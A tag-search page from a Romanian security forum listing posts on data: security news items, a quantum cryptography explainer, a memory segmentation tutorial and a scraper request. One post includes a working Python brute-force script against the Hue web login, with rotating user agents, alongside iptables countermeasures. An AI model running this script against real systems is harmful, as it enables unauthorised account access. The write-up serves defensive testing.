Jump to content

Search the Community

Showing results for tags 'data'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. Twitter has seen a surge in government requests for user information, according to its latest transparency report. The social media platform has seen a 40% rise in the number of requests from governments around the world since its last report, in July 2014. Hundreds came from the government of Turkey, which has previously attempted to ban Twitter. The most requests came from the US government. All of the large internet companies, including Google, Facebook and Yahoo, now release regular transparency reports in order to keep users informed about how much data is shared with governments. It is part of the industry's response to revelations from former National Security Agency contractor Edward Snowden, which pointed to mass government surveillance programs in the US and abroad. "Providing this insight is simply the right thing to do, especially in an age of increasing concerns about government surveillance," Twitter senior manager of legal policy Jeremy Kessel said in a blogpost. Twitter received 2,871 requests from governments across the world asking it to reveal data about 7,144 of its users in the second half of 2014. Just over half (52%) of the requests had been fulfilled, it said. Most of the requests came from the US government - with 1,622 requests. 80% of which were complied with. The Turkish government made 356 requests, putting it second place behind the US. None of its data requests had been complied with, said Twitter, although it did not go into details about what they had been about. The company also saw an 84% increase in government demands to remove content from Twitter. The top three requesting countries were: Turkey (477) Russia (91) Germany (43) In Turkey, these requests tended to focus on claimed violations of personal rights either for citizens or government officials. Prime Minister Recep Tayyip Erdogan blocked Twitter in Turkey in March after an anonymous source posted allegations of government corruption. The ban was overturned in the courts and the service restored. Russia had sent 108 requests for account information since July, according to Twitter. Previously it had not sent any. It had also sent 91 requests for the removal of content, ranging from posts promoting illegal drugs to attempts to suppress non-violent demonstration. "We denied several requests to silence popular critics of the Russian government and other demands to limit speech about non-violent demonstration in Ukraine," said Mr Kessel. In August, Russia passed laws placing restrictions on users of social media. Bloggers with more than 3,000 daily readers were forced to register with the media regulator, social networks were required to retain six months' worth of data on its users and bloggers were not allowed to remain anonymous. Source
  2. A security consultant has published 10 million passwords along with their corresponding usernames in a move he characterized as both necessary and legally risky given a legal landscape he said increasingly threatens the free flow of hacking-related information. Most of the existing corpus of passwords exposed in hack attacks is stripped of usernames, preventing researchers from studying the possible relationship between the two fields. Mark Burnett, a well-known security consultant who has developed a specialty collecting and researching passwords leaked online, said his sole motivation for releasing the data was to advance what's already known about the way people choose passcodes. At the same time, he said he was worried the list might land him in legal hot water given the recent five-year sentence handed to former Anonymous activist and writer Barrett Brown, in part based on links to hacked authentication data he posted in Internet chat channels. "I think this is completely absurd that I have to write an entire article justifying the release of this data out of fear of prosecution or legal harassment," he wrote in a post published Monday night on his blog. "I had wanted to write an article about the data itself but I will have to do that later because I had to write this lame thing trying to convince the FBI not to raid me." Last March, federal prosecutors dropped criminal charges related to links Brown left in two Internet relay chat channels that were frequented by members of the Anonymous hacker collective. The links led to authentication data taken during the December 2011 hack on Strategic Forecasting by members of Anonymous. Before dropping the charge, prosecutors said the links amounted to the transfer of stolen information. Even though the charge was dropped, however, prosecutors still raised the linking to support their argument Brown deserved a long prison sentence. In Monday night's post, Burnett also raised changes the Obama administration is proposing to federal anti-hacking statutes. Many security professionals have said the revised law would outlaw the publication of links to public password dumps even if the person making the link had no intent to defraud. If the people sharing the information have any reason to believe someone might use it to gain unauthorized computer access, critics have argued, they would be subject to stiff legal penalties under the Computer Fraud and Abuse Act. Including usernames alongside passwords could help advance what's known about passwords in important ways. Researchers, for instance, could use the data to determine how often users include all or part of their usernames in their passwords. Besides citing the benefit to researchers, Burnett also defended the move by noting that most of the leaked passwords were "dead," meaning they had been changed already, and that all of the data was already available online. As password dumps go, 10 million is a large number, but it's still small compared to the seminal 2009 hack of gaming website RockYou, which leaked 32 million passcodes, 14.3 million of which were unique. Last year, The New York Times reported that Russian criminals amassed a database of more than one billion passwords gathered from more than 420,000 websites. As Burnett noted, what sets this latest dump apart is that it was made by a security professional with the goal of advancing the public understanding of password choices. Equally noteworthy will be the reaction it receives from prosecutors. Source
  3. Oracle has issued a patch to fix several bugs in its Hyperion Product Management financial consolidation and reporting application that could be remotely exploited by hackers. Oracle's Proactive Support team announced the fixes, confirming that they address a number of flaws in the Hyperion Planning 11.1.2.2.x part of the application. The company does not offer firm details about the patch to non-registered customers, and had not responded to V3's request for further details at the time of publishing. However, TK Keanini, chief technology officer at Lancope, told V3 that the user base and nature of data handled within Hyperion means customers should be concerned by the flaw. "If you are running this software, it contains up-to-date business intelligence that you must keep secure. So if you are running this software it is incredibly important to keep it up to date and patched," he said. ? "Ask yourself this: if the information in your Hyperion system was compromised and posted to the internet for all to see, would you be OK with that? ? "The problem most companies face is that they sometimes don't know what is running on their network and this is problem number one that must be solved." Keanini explained that companies should patch the remote access vulnerabilities as soon as possible, but added that he has yet to see any evidence of the flaws being actively exploited by hackers. "This is not just one vulnerability but several. The CVEs that have remote access are the most important to fix first," he said. ? "I have not [seen the flaws being exploited] but when data is published to the internet, it is not like attackers take the time to show their timeline and the provenance of the data. ? "This is always interesting data but also a dangerous indicator because it is a lagging indicator at best." The Hyperion patch is one of many critical fixes issued by Oracle this year. The firm released a critical update in January addressing 167 vulnerabilities across hundreds of its products, including Java. Source
  4. “Quantum cryptography uses photons and physics to generate cryptographic keys” What is quantum cryptography? Quantum cryptography is NOT a new algorithm to encrypt and decrypt data. Rather it is a technique of using photons to generate a cryptographic key and transmit it to a receiver using a suitable communication channel. A cryptographic key plays the most important role in cryptography; it is used to encrypt/decrypt data. Types of cryptography There are two types of cryptography: Symmetric Cryptography Asymmetric Cryptography Symmetric Key Cryptography is also known as Secret Key Cryptography (SKC) where a key (any text, numbers, etc.) is used to encrypt data, and the same key is used to decrypt that data. The smallest change in the secret key will fail to decrypt an encrypted message. For example, text that is encrypted using AES encryption with key Infosec will fail to decrypt another cipher text which was encrypted using key INFOSEC. Asymmetric Key Cryptography is also known as Public Key Cryptography (PKC) where two sets of keys are generated. One is called a public key and other is called a private key. A public key is used to encrypt data whereas a private key is used to decrypt that data. Similar to symmetric cryptography, the smallest change in any of the two keys will make them useless to get the original data. A benefit of asymmetric cryptography is that you can share the public key with the whole world so that they can use it to send you encrypted data. And the private key is stored safely with the owner and is used for decryption. One disadvantage of this type of cryptography is that if your private key is lost or leaked then you will have to generate a new pair of public and private keys. Why do we need quantum cryptography? Every new solution is made because of some problem we have with the current solution. The case is no different with this one. Let us see the problem first. The problem with symmetric cryptography is that the same key is used to both encrypt and decrypt the messages. If for some reason that key is leaked to some third party, then it can be used to decrypt communication between two trusted devices or persons. In the worst case, the communication can be intercepted and altered. Today’s huge computing power (these days even Xbox and PlayStation at homes have huge power) can be used to crack a key used in symmetric cryptography. Another major problem with this type of cryptography is how to decide which key to use and how to share between trusted devices or persons. Imagine a key has to be shared between India and America, then that communication too has to be secured before sharing the key. Coming to the problem of asymmetric cryptography, it is not something we are facing right now, but seeing the pace of changing technology, we will be facing it soon. Most of the keys used in public key cryptography are at least 128-bit keys which are considered to be very strong. An attacker can easily get hold of the public key because it is shared by the user. But to generate a private key for that public key involves huge amounts of calculations with permutations and combinations. At present a supercomputer is what you need to crack a PKC and many years to complete it. But it will become pretty much possible with the use of quantum computers which use quantum physics to operate and have very high efficiency and computation speed. A quantum computer is a theoretical concept right now and will utilize atoms and molecules to perform computing at a very high speed. According to Moore’s Law, in an integrated circuit the number of transistors doubles every 2 years. It means that the speed of computing will increase to a very high level every two years. Right now Intel i7 processor integrated circuit has 1.4 billion transistors. Clearly, in the coming decades computing speed will increase and the age of quantum computers will become a reality. Now from our above discussion it is very clear that the biggest problem with the current cryptographic techniques is keys and their security in transmission. How does quantum cryptography work? In quantum cryptography, the source sends a key to the receiver, and this key can be used to decrypt any future messages that are to be sent. When the key has been successfully sent and received, the next step is to send encrypted data to the receiver and let it decrypt and process that data. Important: the key is the main part of cryptography and should be sent in a very secure manner. Quantum cryptography has a different way of sending the key to the receiver. It uses photons to send a key. What is a photon, and how it is used? A photon is the smallest particle of light. It has three types of spins: Horizontal Vertical Diagonal (Right and Left) A photon has the capability to spin in all three states at the same time. How do we use it in cryptography? Another part of physics and photons is polarization. Polarization can be used to polarize (pass through a filter) a photon so that it has a particular spin, vertical or horizontal or diagonal. Polarization of a photon is performed using polarization filters. Now comes Heisenberg’s Uncertainty Principle, which states that it is impossible to measure together the speed and position of a particle with highest accuracy, and its state will change when measured. In other words, if an eavesdropper intercepts the transmitted photons and passes it through its polarizer, if it is wrong it will make the receiver get the wrong photon. Hence the interception of communication will get detected. It means that if a photon is polarized using say X filter (Diagonal Polarization), then to get the original spin of the photon only X filter can be used. If a + filter (Rectilinear Polarization) is used on the photon, then it will either be absorbed by the filter or the polarized photon, will be of different spin than the original photon. For example, a horizontal spinning photon when passed through a wrong filter will lead to diagonal spin, which is incorrect. The below table shows output spin for used polarization: Polarization Output Spin Rectilinear Polarization (+) Horizontal Spin (–) Vertical Spin (|) Diagonal Polarization (X) Left Diagonal Spin () Right Diagonal Spin (/) How to send data using photons One of the major concerns before using quantum cryptography is how to associate data with photons. This problem can be easily solved by assigning the spin of every photon as 0 or 1. Please see the sample table below: Spin Horizontal Spin (–) Vertical Spin (|) Left Diagonal Spin () Right Diagonal Spin (/) Value 0 1 0 1 magine Alice applies polarizations on photons and gets the spin and keeps a note of it. Every spin has a value associated with it. Please refer to the table below: Do note that Alice is able to find the spin of photon after polarization using four detectors (horizontal, vertical, right diagonal, left diagonal). Now the key in binary format is: 0101100110101011 This binary data can be converted into other formats like string and integer, depending upon choice of the users involved in the communication. Let us assume Alice wants the key to be in integer format, so the key will be: In real world implementation, the key should not be this short in length. How to share and verify the key In the above section, Alice applied polarization and calculated the value of the key, which will be transmitted to Bob. Note that transmission of these photons takes place in optical fiber cables. Alice sends the polarized photons to Bob using a suitable communication channel. Bob is listening for incoming photons and randomly applies any polarization (rectilinear or diagonal) and keeps a note of applied polarization, spin and its value. Now when the transmission has completed, Alice and Bob communicate on a public channel which needs not be encrypted. Bob tells Alice only the polarizations (not the spin or value) he applied in the exactly same sequence, and Alice only says YES/NO. This communication will be something like this: In the above communication, Bob gets to know the wrong polarizations. But do note that we have a problem here which is highlighted in orange color. See that Alice said polarization applied is wrong but the spin Bob received had the same bit value (1) as Alice’s. But Bob has no way to find what value Alice has so he has no other way but to discard his results for wrong polarization. After successful key transmission and fixing of wrong polarization, encrypted data can be sent and decrypted when received. Communication interception If a user is intercepting the communication between sender and receiver, then he will have to randomly apply polarization on the photons sent. After polarization, he will forward it to the original sender. But it is impossible for the eavesdropper to guess all polarizations correctly. So when Bob and Alice validate the polarizations, and Bob fails to decrypt the data, then the interception of communication will get detected. Conclusion Privacy and data security is right now of utmost importance to people. With quantum cryptography, secure transmission of data is possible, and chances of it being intercepted and altered are very low. This technology has been implemented in some areas. But is still under deeper research before being widely implemented. Reference: How Quantum Cryptology Works - HowStuffWorks Source
  5. The term “Big Data” has been flinging around quite a lot lately. It is in the news all the time. We hear about how much it has pushed us into the future and into the internet of things. These things all will produce useful data that will need to be analyzed and stored. One technology that we hear more and more about is Hadoop. Hadoop was birthed as an open source project from the Google filesystem (GFS), and Map Reduce white-papers; the creator is Doug Cutting and the open source community. Map reduce is the core of Hadoop, and allows the user to write very simple programs to distribute workload across a complex amount of data. The Google filesystem inspired the majority of the work for the open source Hadoop filesystem (HDFS). HDFS is a redundant filesystem written in Java that distributes data across multiple machines that can be analyzed using Map reduce programming. That is just a brief dive into what Hadoop is, and if you want to learn more I highly recommend you take a gander at the Yahoo Hadoop tutorial. Here is an ecosystem filled with projects that make managing this complex monster easier on administrator’s and developer’s. One of these projects that I really enjoy is Hue, the Hadoop User Experience. It gives a web interface for the user to query their data using some of these projects that live in this big data ecosystem like: Hive Pig Oozie Impala Each of these tools sits in front of a plethora of data that the user is analyzing. This data can be anything from a company’s customer generated data that tells a music service what song to play next, to another company trying to figure out which ads to serve you based on your browsing history. My point being — Hue has access to some seriously valuable information. As with most technologies, security is often an after-thought. It is important we test the security of these applications so that we can protect my data and your data from the evil-doers who will sell the same information or use it for awful things. Perhaps a criminal can use pilfered data about you to create malware that you will more easily fall prey to. The reason that I have picked Hue as an example of a much larger conversation is because it is pretty, and it does cool things. Hue has a standard user management system that allows the administrator to grant access to certain accounts. Lets crack some Hue accounts! Of course in this article I’m using a Virtual Machine and not testing on live systems in the wild. That would be highly unethical…but the point of this is to help others remember that not all people out there are ethical, and to “scare” people into taking preventive measures to thwart attacks — much like children stories about being good or the boogie man will get you. So, I decided to test the limits and see how easy it would be to crack into a Hue account using old school methods of brute-forcing. As a standard bad practice people use the username ‘admin’ as the default administrative user for their systems. Shall we see if we can crack a user account. ~$ ./hute.py .... .... .... .... .... .... .... .... .... .... .... Success! admin:admin Completed attack at 2014-09-30 16:19:55.113608 Here is the source code for those who care and would like to test their own systems using the same methods in this proof of concept. #!/usr/bin/python import sys import requests import datetime from fake_useragent import UserAgent ## CONFIG STARTS HERE ## user = "admin" host = "hostname:port" listfile = "~/dictionaries/top1000-worst-passwords.txt" ## CONFIG ENDS HERE## dictionary = open(listfile) list = dictionary.readlines() words = [ ] print "Initializing dictionary", for entry in list: print('.'), newword = entry.rstrip("\n") words.append(newword) print "Now testing " for password in words: ua = UserAgent().random headers = { "User-Agent" : ua } post = { "username" : user, "password" : password } r = requests.post("http://" + host + "/accounts/login/?next=/", headers=headers, data=post) invalid = r.text.find("Invalid") if invalid == -1: print "\nSuccess! " + user + ":" + password print "Completed test at ", print datetime.datetime.now() sys.exit() else: print "...." print "Attack unsuccessful...Completed at ", print datetime.datetime.now() What next, how do we stop the attacks? At the time of this writing it would seem that Hue does not have a mechanism for two-factor authentication, although there are libraries out there for two factor auth within django. What we can do is protect Hue with some iptables magic. We can use iptables’ recent module to keep an eye out for shady traffic and to act on that traffic: $ iptables -I INPUT -p tcp --dport 8888 -m state --state NEW -m recent --name hue-firewall --update --seconds 30 --hitcount 10 -j DROP ~$ iptables -I INPUT -p tcp --dport 8888 -m state --state NEW -m recent --name hue-firewall --set Above when we have more than 10 immediate hits we will drop the incoming traffic for 30 seconds, thus thwarting any effective bruteforce attempt. It is not full-proof, but definitely going to put a dent in most bruteforce attacks on Hue. The point of this article is to not shame Hue by any means, but to shine light on security in this emerging space. Unfortunately the issue of bruteforce is an age old concern. The developers and systems administrators would like to blame the users themselves for choosing such awful passphrases. We can shuffle this around all we want, but only a few lines of code to save the user from hanging themselves — which is the job of the developer. These security lessons have been learned time and time again Source
  6. Salut, am nevoie de un programel, care sa: - preia profiluri de steam de pe csgolounge.com - calculeaza valoarea itemelor din inventarul de la CSGO (APPid = 730) - daca valoarea itemelor este mai mare decat o variabila pe care eu o setez si levelul de la steam este intr-un interval specificat de mine, atunci salveaza linkul catre inventar intr-un fisier - daca linkul este deja acolo, sare peste el Format fisier de output (am folosit separatorul "||", nu conteaza, poate fi orice separator care are sens acolo). DATA SI ORA INCEPUT si DATA SI ORA SFARSIT reprezinte momentele in care incep sa caut, respectiv termin cautarea (inchid programul) ----- DATA SI ORA INCEPUT ------- URL_Catre_Profil_1 || Valoare_Inventar || Level_Steam URL_Catre_Profil_2 || Valoare_Inventar || Level_Steam URL_Catre_Profil_3 || Valoare_Inventar || Level_Steam ------ DATA SI ORA SFARSIT ------- Nu prea ma intereseaza in ce limbaj este programul, nu imi trebuie gui, important este sa isi faca treaba cum trebuie. Si aici este alt aspect. Vreau ca programul sa fie cat mai optimizat, adica sa fie multithreaded. Nu imi trebuie daca gaseste un profil la 2 ore. Cine crede ca poate face acest proiect relativ repede, sa ma contacteze. Am nevoie de un astfel de program intr-o saptamana. Ofer $100 in btc. Desigur, o sa folosim un moderator sa faca escrow. Intru des pe forum, asa ca o sa va raspund repede la mesajele private. Multumesc.
  7. As Ars has previously reported, documents passed to journalists by former National Security Agency contractor Edward Snowden have shown that the NSA and its British counterpart agency, the GCHQ, have exploited privacy "leaks" in mobile applications (including Rovio's Angry Birds) to track individuals of interest. A new document recently published by Der Spiegel provides further details on just how much the GCHQ was able to extract from mobile data to keep tabs on those it targeted for surveillance. The British agency used a program referred to as BADASS to suck up data emitted from Angry Birds and other apps, and the information was so granular, analysts could even track how well (or poorly) a person was doing playing. BADASS is an acronym for "BEGAL Automated Deployment And Survey System," and the system pulled in data from GCHQ and NSA network taps identified as mobile analytics and advertising traffic. Among other things, this data included Google "pref" cookies (such as those used by Ars to identify users in our own passive network surveillance testing with NPR) and Flurry application analytic data used by developers to track usage and performance of their mobile apps. User location data and activity could also be monitored based on the data stream, allowing analysts to pinpoint an active user within minutes, according to the GCHQ presentation from 2011. Much of this data was easily tracked because the mobile apps did not encrypt data in transit, leaving data exposed to anyone who might be able to monitor the network. That's still the case for many of these analytics and advertising services. Source
  8. Atacuri cibernetice orientate asupra institutiilor guvernamentale, companiilor si organizatiilor internationale au crescut in ultimii ani. Malware-ul este arma aleasa. Timp de sapte ani, G DATA a urmarit activitatea uneia dintre cele mai cunoscute programe malware: Agent.BTZ. In 2008, tulpina malware a fost implicata intr-un atac cibernetic asupra Pentagonului din Statele Unite ale Americii. In 2014, s-a constatat ca programul spyware Uroburos a atacat atat Ministerelor de Externe belgian, cat ?i pe cel finlandez. In noiembrie 2014, ComRAT (succesorul Agent.BTZ a) a fost descoperit si analizat in detaliu, dezvaluind similitudini tehnice cu rootkit-ul Uroburos. In toate mostrele malware analizate, expertii G DATA au gasit coduri de program similare. Cum procedeaza autorii pentru a atinge conceptul de cyber-spionaj? Pentru a ilustra modul in care este dezvoltat un program spyware extrem de complex, expertii in securitate au investigat indeaproape Agent.BTZ si ComRAT – in total 46 de probe diferite au fost analizate intr-o perioada de sapte ani. “Ca urmare a analizei, acum avem date privind sapte ani de dezvoltare a malware-ului, care a fost folosit de catre un grup de infractori in atacuri indreptate asupra unor tinte extrem de sensibile, cum ar fi Pentagonul SUA in 2008, Ministerul de Externe Belgian si Ministerul de Externe Finlandez in 2014?, explica Ralf Benzmuller, seful G Data SecurityLabs. Modificari minore ale software-ului Pana la versiunea 3.00, in 2012, expertii de securitate G Data detecteaza doar modificari minore ale software-ului. S-au f?cut modificari pentru versiunile de Windows, au fost eliminate erori de programare si s-au adaugat metode camuflate de atac. Cea mai mare actualizare a avut loc in versiunea 3.00 a malware-ului ComRAT. Cu toate acestea, metodele atacatorilor nu sunt foarte clare. Expertii de securitate banuiesc ca in spatele malware-ului sunt hackeri bine pregatiti, care stiu cum sa-si acopere urmele. Analistii G Data sunt siguri ca grupul din spatele Uroburos, Agent.BTZ si ComRAT continua sa fie activ in atacuri malware si in zona APT (Advanced Persistent Threat). Cele mai recente dezvaluiri si anumite legaturi duc la speculatii ca mai multe atacuri pot fi de asteptate in viitor. Analiza detaliata a programului complex spyware este descrisa pe: https://blog.gdatasoftware.com/blog/article/evolution-of-sophisticated-spyware-from-agentbtz-to-comrat.html Expertii G Data au analizat succesorul lui Agent.BTZ, ComRAT: https://blog.gdatasoftware.com/blog/article/the-uroburos-case-new-sophisticated-rat-identified.html Deturnarea de obiecte COM este cercetata in detaliu pe G DATA SecurityBlog: https://blog.gdatasoftware.com/blog/article/com-object-hijacking-the-discreet-way-of-persistence.html Analiza Uroburos poate fi gasita pe G DATA SecurityBlog (https://blog.gdatasoftware.com/blog/article/uroburos-highly-complex-espionage-software-with-russian-roots.html), impreuna cu o analiza tehnica detaliata a functionalitatilor malware-ului (https://blog.gdatasoftware.com/blog/article/uroburos-deeper-travel-into-kernel-protection-mitigation.html). -> Source <-
  9. Argus is a fixed-model Real Time Flow Monitor designed to track and report on the status and performance of all network transactions seen in a data network traffic stream. Argus provides a common data format for reporting flow metrics such as connectivity, capacity, demand, loss, delay, and jitter on a per transaction basis. The record format that Argus uses is flexible and extensible, supporting generic flow identifiers and metrics, as well as application/protocol specific information. Argus is composed of an advanced comprehensive network flow data generator, the Argus sensor, which processes packets (either capture files or live packet data) and generates detailed network flow status reports of all the flows in the packet stream. Argus captures much of the packet dynamics and semantics of each flow, with a great deal of data reduction, so you can store, process, inspect and analyze large amounts of network data efficiently. Argus provides reachability, availability, connectivity, duration, rate, load, good-put, loss, jitter, retransmission, and delay metrics for all network flows, and captures most attributes that are available from the packet contents, such as L2 addresses, tunnel identifiers (MPLS, GRE, ESP, etc…), protocol ids, SAP’s, hop-count, options, L4 transport identification (RTP, RTCP detection), host flow control indications, etc. Argus is used by many sites to generate network activity reports for every network transaction on their networks. The network audit data that Argus generates is great for security, operations and performance management. The data is used for network forensics, non-repudiation, network asset and service inventory, behavioral baselining of server and client relationships, detecting covert channels, and analyzing Zero day events. Argus is an Open Source project, currently running on Mac OS X, Linux, Solaris, FreeBSD, OpenBSD, NetBSD, AIX, IRIX, Windows (under Cygwin) and OpenWrt, and has been ported to many hardware accelerated platforms, such as Bivio, Pluribus, Arista, and Tilera. The software should be portable to many other environments with littleor no modifications. Performance is such that auditing an entire enterprise’s Internet activity can be accomplished using modest computing resources. Download: ARGUS- Auditing Network Activity - Getting Argus
  10. Obama’s proposed hacking law could unwittingly make you a criminal Next week, Obama is expected to unveil an update to the US’ CFAA law against hacking in a State of the Union address, hot on the tail of Sony’s massive hacking attack that unfolded in late 2014. A draft version of the new law has been published on the White House website and gives us a look into a scary future in which clicking a single link could make you complicit in committing a hacking crime. A letter accompanying the proposal dated January 13 introduces the new law to Congress for discussion. Remember when Sony wanted to sue Twitter (and individual users) who posted screenshots or links to its stolen data? According to Errata Security, these new laws could pin you as a “racketeer” who willingly participated in hacking if you were one of those users (or if you clicked one of those links); punishable by up to 10 years in jail. Didn’t click a link? There are plenty of other ways you could be in legal trouble; Errata points out that something as trivial as being in an IRC channel where others are discussing a hack or having an online conversation with a “hacker” could make you a member of a “criminal enterprise,” which would allow the FBI to confiscate all your electronics. The piece of legislation also could cover data like email address and password dumps that might be found on services like Pastebin. If you accessed one of those knowingly, you could be punishable for the complete hacking offense under the draft legislation. This is to say, that if you accessed a data leak from inside a company that was shared online by another party, the language in the updated proposal says that you would now be punishable to the same extent as those who performed the hacking themselves. That’s up to 20 years in prison, along with other potential penalties. The proposed legislation is also worrisome for those in the penetration testing industry. I talked with Dan Tentler, a prominent computer security researcher on Twitter, who is worried that his job itself could become legally sketchy. Dan Tentler @vIss so the whitehouse thinks that by disarming the good guys, it'll stop bad guys. Good job, fellas. *slow clap* Obama’s proposal — which is expected to be made next week — has a few major hurdles to make it into actual law, but it’s cause for concern that even a draft is so broad about the definition of hacking itself and who can be held accountable for it. Tentler expressed concerns that the definition of “protected computer” is so vague that it could be stretched to almost anything. Is a “protected computer” one that is wide open to the internet with minimal security? Or does simply having a basic firewall enabled imply protection? The Washington Post expressed similar concerns, citing that it’s hard to define when a computer is protected if information is available online, without hindrance. The wording could make almost anyone who found themselves stumbling over data they shouldn’t — let alone those that make a living searching for and reporting security flaws — liable for a crime they didn’t commit. Errata Security also pointed out in its blog that “most hacking is international and anonymous” and says the government “can’t catch the perpetrators no matter how much they criminalize the activities.” He believes that instead, “while Obama’s new laws will dramatically increase hacking prosecutions, they’ll be of largely innocent people rather than the real hackers that matter.” The story of Weev’s imprisonment in 2013 for accessing and sharing data that wasn’t properly protected shows how vague laws can be a problem in a world where companies often aren’t being held responsible for customer data. Since it’s still early days for the law, it’s hard to say what the implications truly could be, but if it’s as broad as it appears, it could put people in danger unwittingly. Cyber security legislation is important in the wake of the Sony hack, but this doesn’t appear to be the right way to go about it. Obama's Proposed Hacking Law Could Make You a Criminal
  11. Nume: SSebastian.Net Fondator: Sava Sebastian-Florin (Eu) Categorie: Blog Nr. total mesaje: Blog Nr. total membri: Blog Descriere: Blog personal Sava Sebastian-Florin. Site: SSebastian.Net - Blog personal Sava Sebastian-Florin
  12. The number of subpoenas, total orders and warrants that the United States government delivered to Verizon all dropped in the second half of 2014, according to the company’s latest transparency report. The giant telecom provider released data on Thursday that showed a decrease in subpoenas of about 10 percent from the first half of last year to the second half. The volume of pen register and trap and trace orders fell by a little less than 10 percent, and the number of warrants served on Verizon by law enforcement also dropped from 14,977 to 13,050. Verizon officials said in the report that the company received between 0-999 National Security Letters during the second half of 2014, the same range it reported for the first half of the year. The government only allows companies to report the number of NSLs they receive in bands of 1,000. The volume of wiretap orders that Verizon receives remained virtually unchanged from 2013 to 2014, falling slightly from 1,496 in all of 2013 to 1,433. In addition to releasing the data on government orders, Verizon officials also said that the company has been working on privacy issues throughout the past year. “While much of our work to protect our customers’ privacy is done behind the scenes, in the past year we took public positions on issues of significance to our customers. We’ve opposed the United States government’s position that it could issue a search warrant to obtain customer emails stored in a Microsoft server in Ireland. We have a particular interest in this issue as we provide cloud computing and data storage services to business customers around the world, including many non-U.S. customers in data centers outside the United States,” said Craig Silliman, executive vice president and general counsel. “Although Verizon has not received any warrants from the U.S. government for our customers’ information stored in our overseas data centers, we filed briefs in courts and worked with Senators on a bill (The LEADS Act) to help defeat this overreach by the U.S. government. We also continue to support legislation that will add privacy protections to the Foreign Intelligence Surveillance Act (FISA) statute, including ending bulk collection of communications data.” In terms of secret orders from the Foreign Intelligence Surveillance Court, Verizon said it received between 0-999 FISA orders in the first half of 2014. Those orders targeted between 3,000-3,999 customer selectors, meaning that Verizon definitely received some non-zero number of FISA orders. The government makes companies wait six months before reporting FISA data, so the numbers from the first half of last year are the most recent information Verizon can publish. Source
  13. In acest articol voi vorbi despre memory segmentation.voi defini intrun mod destul de clar cum vine impartita memoria in segmente atunci cand vine creat un executabil.Avand in vedere faptul ca exista mai multe tipuri de memorie pentru a clarifica lucrurile main memory se refera la RAM.In acest tutorial am vorbit despre memorie hysical && Virtual Memory Explained iar aici voi vorbi despre modul in care memoria RAM vine impartita in segmente.Dupa acest tutorial se va putea intelege conceptul de stack si heap.Voi explica doar lucrurile esentiale iar ceea ce e mai complicat il veti intelege dpe parcurs doar daca veti programa in C sau Assembly. Un alt tutorial care va poate fi de ajutor pentru a intelege ceea ce va fi descris aici este Basic GAS AT&T Assembly Syntax [Tutorial] .Daca vati saturat sa auziti de PUSH,POP,ESP,EBP,EIP,STACK,HEAP,BUFFER atunci lasati-o balta deoarece acest tutorial nu e pentru voi. Voi incepe cu urmatoarea definite:Memoria ram vine impartita in segmente pe care le putem definii sectii de memorie.Cand si unde poate fi observat acest lucru?In momentul in care vine scris un executabil datele din codul sursa impreuna cu instructiile vin salvate in memorie.Ei bine fiecare data din executabil vine salvata intro anumita sectie de memorie.La ce ajuta sa cunosti acest lucru?Ei bine raspunsul e simplu , deoarece iti permite sa ai controlul asupra executabilului si a sistemului.Cum? Veti observa si va veti da seama doar daca veti continua sa studiati acest principiu.Voi prezenta sectiile in care poate fi impartita memoria iar in momentul in care voi face un exemplu cu o bucata de cod voi explica unde vine pusa fiecare instructie. RAM ------------- - stack - <-segment de memorie dinamic ------------- - - - - - NULL - <-segment de memorie nealocat - - - - ------------- - heap - <-segment de memorie dinamic ------------- - BSS - <-variabile care nu sunt initializate ------------- - data - <-variabile initializate ------------- - text - <-instructiile executabilului ------------- - - - OS - <- spatiu alocat pentru sistemul operativ - - ------------- Sectiile sau zonele de memorie contin anumite adrese , ceea ce este important sa cunoasteti este faptul ca numerotarea adreselor vine facuta de la valoarea cea mai mare plecand in decrement spre 0 , iar segmentul OS ajunge la prima memoria disponibila in RAM.Inca un aspect important , in momentul in care vin introduse date in segmentul stack acesta incepe sa alocheze spatiu din segmentul NULL , iar cand datele vin extrase elibereaza segmentul NULL, acelasi lucru se intampla cu segmentul Heap, atunci cand vin stocate date acesta va ocupa spatiu in Null.(Note:Am chemat acest segment null dar de fapt nu are nici un nume generic ci e doar un spatiu de memorie care nu e folosit)In momentul in care vine scris un executabil variabilele, functiile si instructiile definite vin stocate in aceste segmente.Aici vom face cateva exemple:Urmatoarul exemplu demonstreaza in care segment vor fi stocate anumite variabile #include<stdio.h> #include <stdlib.h> void function() { int first; //stack printf("Introdu un caracter: "); scanf("%d",&first); printf("[+] int %d (va merge in segmentul stack la adresa addr %p)\x0a",first ,&first); return; } int main() { static int second; // va merge in segmentul BSS static int third = 2; // va merge in segmentul data //int *fourth; // urmatoarea variabila este alocata in segmentul stack dar e un pointer in segmentul heap int *fourth = (int*)malloc(sizeof(int)); //heap int *fifth; // un pointer care merge in segmentul stack printf("[+] int second addr %p (va merge in segmentul bss)\x0a",&second); printf("[+] int third addr %p (va merge in segmentul data)\x0a",&third); printf("[+] int fourth addr %p (va merge in segmentul heap)\x0a",&*fourth); printf("[+] int fifth addr %p (va merge in segmentul stack)\x0a",&fifth); function(); return 0; } Va trebui doar sa compilati si sa executati codul, asadar in output veti putea observa fiecare variabila la care adresa se gaseste si in care segment vine stocata.Dupa cum observati istructiile programului vor fi stocate in segmentul text Contents of section .text: 80483a0 31ed5e89 e183e4f0 50545268 20850408 1.^.....PTRh ... 80483b0 68308504 08515668 98840408 e897ffff h0...QVh........ 80483c0 fff49090 90909090 90909090 90909090 ................ 